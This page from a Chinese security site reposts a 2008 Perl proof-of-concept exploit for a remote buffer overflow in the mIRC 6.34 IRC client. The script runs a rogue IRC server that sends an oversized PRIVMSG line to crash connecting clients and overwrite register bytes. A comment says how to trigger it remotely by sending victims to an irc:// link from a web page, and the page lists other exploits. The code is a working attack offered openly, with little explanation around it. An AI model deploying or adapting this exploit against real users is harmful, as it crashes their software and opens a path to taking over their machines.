首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
mIRC 6.34 Remote Buffer Overflow PoC
来源:www.vfocus.net 作者:securfrog 发布时间:2008-10-03  
##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;

sub sock()
{
my $sock=new IO::Socket::INET (
Listen    => 1,
                               
LocalAddr => 'localhost',
                               
LocalPort => 6667,
                              
Proto     => 'tcp');  die unless $sock;

print " [+]IRC Server started on port 6667 \r\n";

$s=$sock->accept(); 
$a = "A" x 313;
$twobytes = "\x43\x43";

print " [+]Sending pickles\r\n";
 
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG  yow : /FINGER yow.\r\n";
}
while(1)
{
sock();
print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ESET SysInspector - 1.1.1.0 (e
·OpenX 2.6 (ac.php bannerid) Re
·phpScheduleIt <= 1.2.10 (reser
·MySQL Quick Admin <= 1.5.5 (CO
·IP Reg <= 0.4 Remote Blind SQL
·ADN Forum <= 1.0b Blind SQL In
·Serv-U 7.2.0.1 (stou con:1) De
·SG Real Estate Portal 2.0 Blin
·Serv-U 7.2.0.1 Remote FTP File
·GdPicture Pro ActiveX (gdpictu
·AdaptCMS Lite <= 1.3 Blind SQL
·Autodesk DWF Viewer Control /
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved